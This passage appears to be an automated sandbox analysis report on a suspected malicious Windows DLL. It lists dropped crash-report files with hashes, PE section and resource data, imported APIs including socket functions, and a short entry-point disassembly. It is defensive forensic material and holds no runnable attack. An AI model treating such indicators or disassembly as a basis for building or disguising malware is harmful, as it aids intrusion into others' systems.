                        Category:dropped
                        Size (bytes):786432
                        Entropy (8bit):0.25063246514845516
                        Encrypted:false
                        SSDEEP:384:+zH+W0StseCJ48EApW0StseCJ48E2rTSjlK/ebmLerYSRSY1J2:+zsSB2nSB2RSjlK/+mLesOj1J2
                        MD5:6A5F82169C1E928B7B2813D982DF0CC4
                        SHA1:5E00E7DC875F2290DEB199B7CDFD88EB7F00FA2B
                        SHA-256:9499ABBD834BC69C141A5659C76E2C1A226C0579893B10375BB19AA659A9BCD5
                        SHA-512:E2B1AD0F38F387DA0207B6BBCBD8927AF5178C84C2EB291623E40AE892D58551DE356EB2BEAE42155B8267455B411B512942545112C0578B08DB11EDE4DC831D
                        Malicious:false
                        Reputation:unknown
                        C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm
                        Process:C:\Windows\System32\svchost.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):16384
                        Entropy (8bit):0.07692722651967188
                        Encrypted:false
                        SSDEEP:3:wW9mllr7vfPUWff8+E2kfoulXDAopll3Vkttlmlnl:wWElZrEWUfoRa3
                        MD5:72D779F2D6EEF5FD6670D0AA17207A6A
                        SHA1:C9D5EC2D9E22E21027BE655F633AE052EA6991ED
                        SHA-256:1FB083D386ED7399D0F5BF9006A1A2283F66D8DCD0CC6106B14D3E439F0CD0EA
                        SHA-512:5DA3FB2B95F46E3D950A27070C25D6A2CD06F6FA79E0038F7AA5B60F071729343718C7FB41C154B1EC3B8A7C632431136C2EB13B947D0E5A875F1EFFF1721506
                        Malicious:false
                        Reputation:unknown
                        C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_loaddll32.exe_669a8c10d0efd6a57917dbe0788b74fa72a925de_7cac0383_1987fea0\Report.wer
                        Process:C:\Windows\SysWOW64\WerFault.exe
                        File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):65536
                        Entropy (8bit):0.7987378948423511
                        Encrypted:false
                        SSDEEP:96:K6qnYy4y9haol7JfHpXIQcQSc6mcEUcw3/s+a+z+HbHgNVG4rmMoVazWbSmEBFdo:gnhHsieryj9q/u7sgS274ItW
                        MD5:A403F656EF604A2E49F9E4ACC2129A24
                        SHA1:AF381E16D8639F6C2A553E58499FC088D151624C
                        SHA-256:198C574233F816519CA62027DD72FF837F64C00F391442DB3BE612A4F6C9BCD7
                        SHA-512:717CAC97CE4145DD90A3B600D32BFF8B749DD64CA7B38E9AD853FEA5D72697EE8BF2DF181AC9350F93AF342880FD1A7A554820551FC0E62C20D07941945FFBBB
                        Malicious:false
                        Reputation:unknown
                        C:\ProgramData\Microsoft\Windows\WER\Temp\WER178B.tmp.csv
                        Process:C:\Windows\System32\svchost.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):51940
                        Entropy (8bit):3.0778019180962497
                        Encrypted:false
                        SSDEEP:768:g+HIinEqdSlI0Lme/AFvprFwgzyLFOUP2IcOenKI:g+HIiTj0Lme/AFdFWL6IcxnKI
                        MD5:F15E9557C7C73AC82EE1B580B68A2CED
                        SHA1:3BE551D3FA3D2713F9A1E990F026642749A95291
                        SHA-256:0884B007D12886A2952F62389F88D2AE4DB62DBB9932C30C436D19C3E17E5255
                        SHA-512:82CB9E72779B86BBA19253D767B7C2269A5385546846EAAF39274F5868FA00BF23220DF70282CB0203AF2B440C9532C5933BC716517F4DBD3DE0643B02365628
                        Malicious:false
                        Reputation:unknown
                        C:\ProgramData\Microsoft\Windows\WER\Temp\WER20B4.tmp.txt
                        Process:C:\Windows\System32\svchost.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):13340
                        Entropy (8bit):2.695073459938915
                        Encrypted:false
                        SSDEEP:96:9GiZYWqRgM+egtYk6YoiWApH+YEZJXtFiPFPDxwUCoBaqS9SMUM8wIDA3:9jZDqRC760AalaqS9SMfuDA3
                        MD5:D49BF9037244600A0CD2D79B93509810
                        SHA1:2833D9A483D595D915E9DEB58BC9926FED4F759E
                        SHA-256:BF470317ADFF9552AA6D0DCF8D8670396BCAC888218FB8315367F8092BB7DE87
                        SHA-512:A449EC0761501982A2A5F6C92433BB50E99FCED6961A46BC52811472A329C87D69D7FEF1D081D76B7F9095DF623C0716069913243124674862DF8BE0C5B145C8
                        Malicious:false
                        Reputation:unknown
                        C:\ProgramData\Microsoft\Windows\WER\Temp\WERE79D.tmp.dmp
                        Process:C:\Windows\SysWOW64\WerFault.exe
                        File Type:Mini DuMP crash report, 15 streams, Sat Jan 15 03:32:59 2022, 0x1205a4 type
                        Category:dropped
                        Size (bytes):45124
                        Entropy (8bit):2.098341530597131
                        Encrypted:false
                        SSDEEP:192:iy8ESGlOJZN9hk6j8JxA7og3Nw//23doYpZDgHLPtelqSi:lSXJD9h7j8JM3Nw//QKYpZDPc3
                        MD5:DAB40B8A2FE746E26BD59BF1F619D0B3
                        SHA1:997A811F47D255D8D0122ABBA88DCF5C55B2AF63
                        SHA-256:F92B6C9AE0E483FBCB33AC6439A2EF5037B44FF2CC6D551DDC85579E5186E2C2
                        SHA-512:001F72EDDDB7281F7171FE0440AA788B119142E9BFE95BD1C45AA4D717744C4C264FD85BD5DB220859B26C7ED11066EB5AEDC378BD659BB631903B40E94BE9A0
                        Malicious:false
                        Reputation:unknown
                        C:\ProgramData\Microsoft\Windows\WER\Temp\WEREDA9.tmp.WERInternalMetadata.xml
                        Process:C:\Windows\SysWOW64\WerFault.exe
                        File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):8348
                        Entropy (8bit):3.697343737092656
                        Encrypted:false
                        SSDEEP:192:Rrl7r3GLNi5Z62N6x6YJlSUnhfcgmfMSwGgUgCpBP89bjisfJhm:RrlsNin62N6x6Y7SUhfcgmfMSw/jhfe
                        MD5:D514B316FFDBD11B597FD5F66CA24489
                        SHA1:6D718BA8A62C1BB7319632453784636A802D7250
                        SHA-256:2B1E5FC24CE57AAAFD0293E548E6B8E3593AD7F7C314DBC9A48AD30B29759D23
                        SHA-512:4600C40C9A76804BFEB66637ACA1C705836E79CD0A2E172A1FEFC59E9AB08D02F1D50E5AA9FA8393A1A1526D2068B2CA512AAD6A90A4024FD70E6DFF0733C139
                        Malicious:false
                        Reputation:unknown
                        Preview: <?xml version="1.0" encoding="UTF-16"?>..<WERReportMetadata>.. <OSVersionInformation>.. <WindowsNTVersion>10.0</WindowsNTVersion>.. <Build>17134</Build>.. <Product>(0x30): Windows 10 Pro</Product>.. <Edition>Professional</Edition>.. <BuildString>17134.1.amd64fre.rs4_release.180410-1804</BuildString>.. <Revision>1</Revision>.. <Flavor>Multiprocessor Free</Flavor>.. <Architecture>X64</Architecture>.. <LCID>1033</LCID>.. </OSVersionInformation>.. <ProcessInformation>.. <Pid>6764</Pid>..
                        C:\ProgramData\Microsoft\Windows\WER\Temp\WERF2EA.tmp.xml
                        Process:C:\Windows\SysWOW64\WerFault.exe
                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):4598
                        Entropy (8bit):4.467767420732888
                        Encrypted:false
                        SSDEEP:48:cvIwSD8zsFJgtWI9TxVWSC8Br8fm8M4J2+dZFDA+q84pUVDKcQIcQw0jd:uITffUiSNeJHgmVDKkw0jd
                        MD5:3A20FBA7560974648D5C6FD0FBE27049
                        SHA1:1B2936A30334473F327037AD839B933AB7B62DAB
                        SHA-256:A4BB07E9135F384984942E1A3465ECE84D992E9D258186FED1A1F8E97542996C
                        SHA-512:333835F634DBA55CA56D86FE9FF0F4C2549DB4DF02E65D32E1922EDF8D5BE670CB5F8B5FB8F54A2DA2040846BC901D4832F28C699D2E4B32702D1DB6EA1FA4CD
                        Malicious:false
                        Reputation:unknown
                        Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1342843" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                        C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
                        Process:C:\Windows\SysWOW64\rundll32.exe
                        File Type:Microsoft Cabinet archive data, 61414 bytes, 1 file
                        Category:dropped
                        Size (bytes):61414
                        Entropy (8bit):7.995245868798237
                        Encrypted:true
                        SSDEEP:1536:EysgU6qmzixT64jYMZ8HbVPGfVDwm/xLZ9rP:wF6qmeo4eH1m9wmLvrP
                        MD5:ACAEDA60C79C6BCAC925EEB3653F45E0
                        SHA1:2AAAE490BCDACCC6172240FF1697753B37AC5578
                        SHA-256:6B0CECCF0103AFD89844761417C1D23ACC41F8AEBF3B7230765209B61EEE5658
                        SHA-512:FEAA6E7ED7DDA1583739B3E531AB5C562A222EE6ECD042690AE7DCFF966717C6E968469A7797265A11F6E899479AE0F3031E8CF5BEBE1492D5205E9C59690900
                        Malicious:false
                        Reputation:unknown
                        C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
                        Process:C:\Windows\SysWOW64\rundll32.exe
                        File Type:data
                        Category:modified
                        Size (bytes):328
                        Entropy (8bit):3.1244568012511515
                        Encrypted:false
                        SSDEEP:6:kK/ik8SN+SkQlPlEGYRMY9z+4KlDA3RUeYlUmlUR/t:3i9kPlE99SNxAhUeYlUSA/t
                        MD5:07CC39D29F4CA82C03F8504E0C7EA130
                        SHA1:70415CF2F85A8F938BD8F2B8C6EBF715C456DDFB
                        SHA-256:0355462F022A6428FFBA5E817D4F32023BF3DEC73C4B4225DBE147E91525B423
                        SHA-512:0BCA6521AD134F78BE1A91967464865A47D7591E941859ED86AFC636DD0565205B273FB6C3603945712F59EA047785ADCB48DF50A8C2A0617D743766A83459F8
                        Malicious:false
                        Reputation:unknown
                        Preview: ...http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab "071e15c5dc4d71:0"...
                        C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
                        Process:C:\Windows\System32\svchost.exe
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):55
                        Entropy (8bit):4.306461250274409
                        Encrypted:false
                        SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                        MD5:DCA83F08D448911A14C22EBCACC5AD57
                        SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                        SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                        SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                        Malicious:false
                        Reputation:unknown
                        Preview: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                        C:\Windows\appcompat\Programs\Amcache.hve
                        Process:C:\Windows\SysWOW64\WerFault.exe
                        File Type:MS Windows registry file, NT/2000 or above
                        Category:dropped
                        Size (bytes):1572864
                        Entropy (8bit):4.215110798990463
                        Encrypted:false
                        SSDEEP:12288:c4o+1HZRlIDertUbZuiJLXbIof4B6be/ZVg/bUcY9NZ0GEx2gqVWOA:Lo+1HZRlIDetUbxDhUz5
                        MD5:868DF6447DD2874362A5BE2ADAF2146A
                        SHA1:2526129D9344E32246BCC0FEC54AB4D11F103242
                        SHA-256:3E47D1DB4AC1E014C1CCAC89CD1269991F017F8DB9E735BE47D7DEC809BE0C2F
                        SHA-512:688BB08B5B2D3E37B256112446849179700A4FE63BA747EEBF4CB74414FE49CCE34E7DD3ED8DD9F453F2CBCAB7D71A7D5D4BD04F31477AFF1502DE9C67DC3D40
                        Malicious:false
                        Reputation:unknown
                        C:\Windows\appcompat\Programs\Amcache.hve.LOG1
                        Process:C:\Windows\SysWOW64\WerFault.exe
                        File Type:MS Windows registry file, NT/2000 or above
                        Category:dropped
                        Size (bytes):16384
                        Entropy (8bit):2.894669053877629
                        Encrypted:false
                        SSDEEP:192:nB1yi16rlb5saYd5FSETJq/bDIpn8h8i1ZV6nGoS6:nBge5lAIpn88iTVgGt6
                        MD5:8E5C9B7424BDF99BA1911FB3FC1025DF
                        SHA1:40EC7528423D63ED6763EE2C849B0EBED3E1BB30
                        SHA-256:D7C473E994FCF24BA803756C84131603042C482D06787A0274B23AC0E749A38D
                        SHA-512:D916D59AFD76CF95D68E3BB47D128E5E356DBD80DD0ADD819ADA538FA1F9208710B4BB7DA6A9D72C65DE3C62E7890CB68C83A5201290B6FE512533D2574886CB
                        Malicious:false
                        Reputation:unknown

                        Static File Info

                        General

                        File type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                        Entropy (8bit):6.767598862658865
                        TrID:
                        • Win32 Dynamic Link Library (generic) (1002004/3) 98.32%
                        • Windows Screen Saver (13104/52) 1.29%
                        • Generic Win/DOS Executable (2004/3) 0.20%
                        • DOS Executable Generic (2002/1) 0.20%
                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                        File name:ALNgwfVtrB.dll
                        File size:588288
                        MD5:61308ba77d051e4e76e532f9709635e0
                        SHA1:95d2cd6c7be346d29735ed970d3f373d37b7e13f
                        SHA256:bd2c1b86de45c3e9d0d7c85322228c3512ce2c041765d95bb613cdf12647bea9
                        SHA512:2baf01ad017b6e5f2940398b8866aed84daa66a069e29e77ecad4dadf4854b206e14e1e8175f59c26f7d6d5a17ea1b2f4e258595d8a33fd4e8675898c576c618
                        SSDEEP:6144:cNU5LwA22222GgngDrDRVyYli/ci2tEGW78ODQiE4tvOSk5DKXOW14IkFxVFgY4E:x5w7YM/cYVV7E5OpOJyvnHtytFyQ

                        File Icon

                        Icon Hash:71b018ccc6577131

                        Static PE Info

                        General

                        Entrypoint:0x1002eaac
                        Entrypoint Section:.text
                        Digitally signed:false
                        Imagebase:0x10000000
                        Subsystem:windows gui
                        Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                        DLL Characteristics:
                        Time Stamp:0x61E03DE6 [Thu Jan 13 14:57:42 2022 UTC]
                        TLS Callbacks:
                        CLR (.Net) Version:
                        OS Version Major:5
                        OS Version Minor:0
                        File Version Major:5
                        File Version Minor:0
                        Subsystem Version Major:5
                        Subsystem Version Minor:0
                        Import Hash:7f57698bb210fa88a6b01b1feaf20957

                        Entrypoint Preview

                        Instruction
                        mov edi, edi
                        push ebp
                        mov ebp, esp
                        cmp dword ptr [ebp+0Ch], 01h
                        jne 00007F8A80B3FCD7h
                        call 00007F8A80B48548h
                        push dword ptr [ebp+08h]
                        mov ecx, dword ptr [ebp+10h]
                        mov edx, dword ptr [ebp+0Ch]
                        call 00007F8A80B3FBC1h
                        pop ecx
                        pop ebp
                        retn 000Ch
                        mov edi, edi
                        push ebp
                        mov ebp, esp
                        push esi
                        push edi
                        mov edi, dword ptr [ebp+10h]
                        mov eax, edi
                        sub eax, 00000000h
                        je 00007F8A80B412BBh
                        dec eax
                        je 00007F8A80B412A3h
                        dec eax
                        je 00007F8A80B4126Eh
                        dec eax
                        je 00007F8A80B4121Fh
                        dec eax
                        je 00007F8A80B4118Fh
                        mov ecx, dword ptr [ebp+0Ch]
                        mov eax, dword ptr [ebp+08h]
                        push ebx
                        push 00000020h
                        pop edx
                        jmp 00007F8A80B40147h
                        mov esi, dword ptr [eax]
                        cmp esi, dword ptr [ecx]
                        je 00007F8A80B3FD4Eh
                        movzx esi, byte ptr [eax]
                        movzx ebx, byte ptr [ecx]
                        sub esi, ebx
                        je 00007F8A80B3FCE7h
                        xor ebx, ebx
                        test esi, esi
                        setnle bl
                        lea ebx, dword ptr [ebx+ebx-01h]
                        mov esi, ebx
                        test esi, esi
                        jne 00007F8A80B4013Fh
                        movzx esi, byte ptr [eax+01h]
                        movzx ebx, byte ptr [ecx+01h]
                        sub esi, ebx
                        je 00007F8A80B3FCE7h
                        xor ebx, ebx
                        test esi, esi
                        setnle bl
                        lea ebx, dword ptr [ebx+ebx-01h]
                        mov esi, ebx
                        test esi, esi
                        jne 00007F8A80B4011Eh
                        movzx esi, byte ptr [eax+02h]
                        movzx ebx, byte ptr [ecx+02h]
                        sub esi, ebx
                        je 00007F8A80B3FCE7h
                        xor ebx, ebx
                        test esi, esi
                        setnle bl
                        lea ebx, dword ptr [ebx+ebx-01h]
                        mov esi, ebx
                        test esi, esi
                        jne 00007F8A80B400FDh

                        Rich Headers

                        Programming Language:
                        • [ C ] VS2008 build 21022
                        • [LNK] VS2008 build 21022
                        • [ C ] VS2005 build 50727
                        • [ASM] VS2008 build 21022
                        • [IMP] VS2005 build 50727
                        • [RES] VS2008 build 21022
                        • [EXP] VS2008 build 21022
                        • [C++] VS2008 build 21022

                        Data Directories

                        Name | Virtual Address | Virtual Size | Is in Section
                        IMAGE_DIRECTORY_ENTRY_EXPORT | 0x50bc0 | 0x50 | .rdata
                        IMAGE_DIRECTORY_ENTRY_IMPORT | 0x4f538 | 0xb4 | .rdata
                        IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x89000 | 0x3410 | .rsrc
                        IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x8d000 | 0x415c | .reloc
                        IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x4bd00 | 0x40 | .rdata
                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_IAT | 0x47000 | 0x454 | .rdata
                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x4f4b0 | 0x40 | .rdata
                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

                        Sections

                        Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                        .text | 0x1000 | 0x45bb9 | 0x45c00 | False | 0.379756804435 | data | 6.37093799262 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                        .rdata | 0x47000 | 0x9c10 | 0x9e00 | False | 0.357397151899 | data | 5.22204269745 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                        .data | 0x51000 | 0x3735c | 0x33800 | False | 0.741035535498 | data | 6.11335979295 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                        .rsrc | 0x89000 | 0x3410 | 0x3600 | False | 0.306640625 | data | 4.34913645958 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                        .reloc | 0x8d000 | 0x8c34 | 0x8e00 | False | 0.346308318662 | data | 4.00973830682 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                        Resources

                        Name | RVA | Size | Type | Language | Country
                        RT_CURSOR | 0x89ac0 | 0x134 | data | Chinese | China
                        RT_CURSOR | 0x89bf4 | 0xb4 | data | Chinese | China
                        RT_CURSOR | 0x89ca8 | 0x134 | AmigaOS bitmap font | Chinese | China
                        RT_CURSOR | 0x89ddc | 0x134 | data | Chinese | China
                        RT_CURSOR | 0x89f10 | 0x134 | data | Chinese | China
                        RT_CURSOR | 0x8a044 | 0x134 | data | Chinese | China
                        RT_CURSOR | 0x8a178 | 0x134 | data | Chinese | China
                        RT_CURSOR | 0x8a2ac | 0x134 | data | Chinese | China
                        RT_CURSOR | 0x8a3e0 | 0x134 | data | Chinese | China
                        RT_CURSOR | 0x8a514 | 0x134 | data | Chinese | China
                        RT_CURSOR | 0x8a648 | 0x134 | data | Chinese | China
                        RT_CURSOR | 0x8a77c | 0x134 | data | Chinese | China
                        RT_CURSOR | 0x8a8b0 | 0x134 | AmigaOS bitmap font | Chinese | China
                        RT_CURSOR | 0x8a9e4 | 0x134 | data | Chinese | China
                        RT_CURSOR | 0x8ab18 | 0x134 | data | Chinese | China
                        RT_CURSOR | 0x8ac4c | 0x134 | data | Chinese | China
                        RT_BITMAP | 0x8ad80 | 0xb8 | data | Chinese | China
                        RT_BITMAP | 0x8ae38 | 0x144 | data | Chinese | China
                        RT_ICON | 0x8af7c | 0x2e8 | dBase IV DBT of @.DBF, block length 512, next free block index 40, next free block 67108992, next used block 3293332676 | Chinese | China
                        RT_ICON | 0x8b264 | 0x128 | GLS_BINARY_LSB_FIRST | Chinese | China
                        RT_DIALOG | 0x8b38c | 0x33c | data | Chinese | China
                        RT_DIALOG | 0x8b6c8 | 0xe2 | data | Chinese | China
                        RT_DIALOG | 0x8b7ac | 0x34 | data | Chinese | China
                        RT_STRING | 0x8b7e0 | 0x4e | data | Chinese | China
                        RT_STRING | 0x8b830 | 0x2c | data | Chinese | China
                        RT_STRING | 0x8b85c | 0x82 | data | Chinese | China
                        RT_STRING | 0x8b8e0 | 0x1d6 | data | Chinese | China
                        RT_STRING | 0x8bab8 | 0x160 | data | Chinese | China
                        RT_STRING | 0x8bc18 | 0x12e | data | Chinese | China
                        RT_STRING | 0x8bd48 | 0x50 | data | Chinese | China
                        RT_STRING | 0x8bd98 | 0x44 | data | Chinese | China
                        RT_STRING | 0x8bddc | 0x68 | data | Chinese | China
                        RT_STRING | 0x8be44 | 0x1b8 | data | Chinese | China
                        RT_STRING | 0x8bffc | 0x104 | data | Chinese | China
                        RT_STRING | 0x8c100 | 0x24 | data | Chinese | China
                        RT_STRING | 0x8c124 | 0x30 | data | Chinese | China
                        RT_GROUP_CURSOR | 0x8c154 | 0x22 | Lotus unknown worksheet or configuration, revision 0x2 | Chinese | China
                        RT_GROUP_CURSOR | 0x8c178 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | Chinese | China
                        RT_GROUP_CURSOR | 0x8c18c | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | Chinese | China
                        RT_GROUP_CURSOR | 0x8c1a0 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | Chinese | China
                        RT_GROUP_CURSOR | 0x8c1b4 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | Chinese | China
                        RT_GROUP_CURSOR | 0x8c1c8 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | Chinese | China
                        RT_GROUP_CURSOR | 0x8c1dc | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | Chinese | China
                        RT_GROUP_CURSOR | 0x8c1f0 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | Chinese | China
                        RT_GROUP_CURSOR | 0x8c204 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | Chinese | China
                        RT_GROUP_CURSOR | 0x8c218 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | Chinese | China
                        RT_GROUP_CURSOR | 0x8c22c | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | Chinese | China
                        RT_GROUP_CURSOR | 0x8c240 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | Chinese | China
                        RT_GROUP_CURSOR | 0x8c254 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | Chinese | China
                        RT_GROUP_CURSOR | 0x8c268 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | Chinese | China
                        RT_GROUP_CURSOR | 0x8c27c | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | Chinese | China
                        RT_GROUP_ICON | 0x8c290 | 0x22 | data | Chinese | China
                        RT_MANIFEST | 0x8c2b4 | 0x15a | ASCII text, with CRLF line terminators | English | United States

                        Imports

                        DLL | Import
                        KERNEL32.dll | GetOEMCP, GetCommandLineA, RtlUnwind, ExitProcess, HeapReAlloc, RaiseException, HeapSize, TerminateProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, GetACP, IsValidCodePage, LCMapStringA, LCMapStringW, HeapCreate, HeapDestroy, GetStdHandle, GetCPInfo, GetFileType, GetStartupInfoA, FreeEnvironmentStringsA, GetEnvironmentStrings, FreeEnvironmentStringsW, GetEnvironmentStringsW, QueryPerformanceCounter, GetTickCount, GetSystemTimeAsFileTime, InitializeCriticalSectionAndSpinCount, GetConsoleCP, GetConsoleMode, GetStringTypeA, GetStringTypeW, GetUserDefaultLCID, EnumSystemLocalesA, IsValidLocale, GetLocaleInfoW, SetStdHandle, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW, GetModuleHandleW, CreateFileA, GetCurrentProcess, FlushFileBuffers, SetFilePointer, WriteFile, ReadFile, InterlockedIncrement, TlsFree, LocalReAlloc, TlsSetValue, TlsAlloc, GlobalHandle, GlobalReAlloc, TlsGetValue, LocalAlloc, WritePrivateProfileStringA, GlobalFlags, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSection, GlobalGetAtomNameA, GlobalFindAtomA, lstrcmpW, GetVersionExA, FormatMessageA, LocalFree, lstrlenA, InterlockedDecrement, MulDiv, MultiByteToWideChar, GlobalUnlock, GlobalFree, FreeResource, GlobalAddAtomA, GetCurrentProcessId, GetLastError, GlobalDeleteAtom, GetCurrentThread, GetCurrentThreadId, ConvertDefaultLocale, EnumResourceLanguagesA, GetModuleFileNameA, GetLocaleInfoA, WideCharToMultiByte, CompareStringA, FindResourceA, LoadResource, LockResource, SizeofResource, InterlockedExchange, GlobalLock, lstrcmpA, GlobalAlloc, GetModuleHandleA, CreateThread, CloseHandle, VirtualProtect, LoadLibraryA, VirtualAlloc, GetProcAddress, SetLastError, Sleep, IsBadReadPtr, GetProcessHeap, VirtualFree, HeapFree, HeapAlloc, FreeLibrary, VirtualQuery, SetHandleCount, GetNativeSystemInfo
                        USER32.dll | LoadCursorA, GetSysColorBrush, SetWindowTextA, IsDialogMessageA, SetDlgItemTextA, GetDlgItemTextA, RegisterWindowMessageA, SendDlgItemMessageA, WinHelpA, GetCapture, GetClassLongA, GetClassNameA, SetPropA, GetPropA, RemovePropA, GetForegroundWindow, GetTopWindow, GetMessageTime, GetMessagePos, MapWindowPoints, SetMenu, SetForegroundWindow, CreateWindowExA, GetClassInfoExA, GetClassInfoA, RegisterClassA, AdjustWindowRectEx, CopyRect, PtInRect, GetDlgCtrlID, DefWindowProcA, CallWindowProcA, SetWindowLongA, SetWindowPos, SystemParametersInfoA, GetWindowPlacement, GetWindowRect, GetMenuItemID, GetMenuItemCount, GetSubMenu, UnhookWindowsHookEx, GetSysColor, EndPaint, BeginPaint, ReleaseDC, GetDC, ClientToScreen, GrayStringA, DrawTextExA, DrawTextA, TabbedTextOutA, GetWindowTextLengthA, GetWindowTextA, GetWindow, SetFocus, GetDesktopWindow, SetActiveWindow, CreateDialogIndirectParamA, DestroyWindow, IsWindow, GetDlgItem, GetNextDlgTabItem, EndDialog, SetWindowsHookExA, CallNextHookEx, GetMessageA, DestroyMenu, UpdateWindow, TranslateMessage, DispatchMessageA, GetActiveWindow, IsWindowVisible, GetKeyState, PeekMessageA, GetCursorPos, ValidateRect, GetWindowThreadProcessId, GetWindowLongA, GetLastActivePopup, IsWindowEnabled, MessageBoxA, SetCursor, PostQuitMessage, SetMenuItemBitmaps, GetMenuCheckMarkDimensions, LoadBitmapA, GetFocus, GetParent, ModifyMenuA, GetMenuState, EnableMenuItem, CheckMenuItem, SetTimer, IsIconic, KillTimer, LoadIconA, DrawIcon, GetClientRect, SendMessageA, ShowWindow, PostMessageA, GetSystemMetrics, EnableWindow, GetMenu
                        GDI32.dll | GetStockObject, SelectObject, GetDeviceCaps, DeleteDC, Escape, ExtTextOutA, TextOutA, RectVisible, ScaleWindowExtEx, SetWindowExtEx, ScaleViewportExtEx, SetViewportExtEx, OffsetViewportOrgEx, CreateBitmap, PtVisible, GetObjectA, DeleteObject, GetClipBox, SetMapMode, SetTextColor, SetBkColor, RestoreDC, SaveDC, SetViewportOrgEx
                        WINSPOOL.DRV | DocumentPropertiesA, ClosePrinter, OpenPrinterA
                        ADVAPI32.dll | RegSetValueExA, RegCreateKeyExA, RegQueryValueA, RegOpenKeyA, RegEnumKeyA, RegDeleteKeyA, RegOpenKeyExA, RegQueryValueExA, RegCloseKey
                        SHLWAPI.dll | PathFindExtensionA
                        OLEAUT32.dll | VariantClear, VariantChangeType, VariantInit
                        WS2_32.dll | htons, setsockopt, sendto, htonl, bind, socket, closesocket, inet_addr, recvfrom, WSACleanup, WSAStartup

                        Exports

                        Name | Ordinal | Address
                        DllRegisterServer | 1 | 0x1001df20

                        Possible Origin

                        Language of compilation system | Country where language is spoken
                        Chinese | China
                        English | United States

                        Network Behavior

                        Snort IDS Alerts

